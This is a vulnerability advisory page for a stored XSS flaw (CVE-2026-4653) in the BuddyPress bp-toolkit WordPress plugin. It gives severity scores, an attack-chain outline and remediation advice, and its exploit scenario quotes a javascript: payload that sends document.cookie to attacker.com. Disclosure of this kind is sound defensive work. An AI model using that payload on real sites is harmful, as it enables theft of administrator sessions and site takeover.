Skip to main content

BuddyPress bp-toolkit CVE-2026-4653

| EUVDEUVD-2026-42519 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-09 Wordfence GHSA-wf3h-wgr2-59j7
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Stored XSS still requires a victim to navigate to the injected page (UI:R); subscriber-level account needed (PR:L); payload executes in victim browser scope (S:C); no availability impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 09, 2026 - 08:31 vuln.today
CVE Published
Jul 09, 2026 - 06:52 nvd
MEDIUM 6.4

DescriptionCVE.org

The Block, Suspend, Report for BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter in versions up to and including 3.6.4. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored XSS in the Block, Suspend, Report for BuddyPress WordPress plugin (bp-toolkit) through version 3.6.4 allows low-privileged authenticated attackers to inject persistent malicious scripts via the 'link' parameter in report submissions. Authenticated users with subscriber-level access can plant JavaScript payloads that execute in any visitor's browser upon accessing the affected report pages, with Changed Scope (S:C) indicating execution in the victim's security context rather than the application's. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register subscriber account on open-registration site
Delivery
Submit member report with malicious 'link' payload
Exploit
Payload persisted unsanitized to WordPress database
Execution
Administrator reviews report in wp-admin
Persist
Stored XSS executes in admin browser context
Impact
Admin session token exfiltrated to attacker infrastructure

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold a valid WordPress account at subscriber level or higher on the target site - on BuddyPress community sites with open registration this is freely obtainable without prior authorization. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 6.4 (Medium) reflects network-accessible, low-complexity exploitation requiring low privileges (PR:L, subscriber-level) with Changed Scope and Low confidentiality and integrity impact each. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a free subscriber account on an open-registration BuddyPress community site and submits a report against another member, supplying a crafted 'link' value such as 'javascript:fetch("https://attacker.com/?c="+document.cookie)' as the report link. When a WordPress administrator later opens the submitted report in the wp-admin panel, the stored payload executes silently in the admin's browser, exfiltrating the admin session cookie and enabling the attacker to take full control of the WordPress site.
Remediation An upstream fix has been committed to the WordPress Plugin SVN repository as changeset 3523211 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3523211%40bp-toolkit&new=3523211%40bp-toolkit); however, a specific released patched version number is not confirmed from available data - administrators should check the WordPress plugin repository for any version newer than 3.6.4 and update immediately if one is available. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-4653 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy